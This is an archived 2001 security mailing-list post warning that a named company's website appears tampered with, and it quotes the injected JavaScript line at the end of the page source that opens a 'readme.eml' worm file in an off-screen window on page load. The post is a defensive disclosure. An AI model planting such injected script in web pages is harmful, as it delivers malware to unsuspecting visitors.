This is not good. http://www.amariplastics.com/ tries to run/download the readme.eml worm/trojan/thing when you browse it. It looks like their website has been tampered with or something as the last 3 lines of the HTML source read: </body> </html> <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> which does exactly what it look like. Please be careful, one of the chaps here said it AUTOMATICALLY downloaded and ran the file. My machine asked me what to do. I said CANCEL, and so should you. Regards, -- Sean Kelly ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:00:51 PDT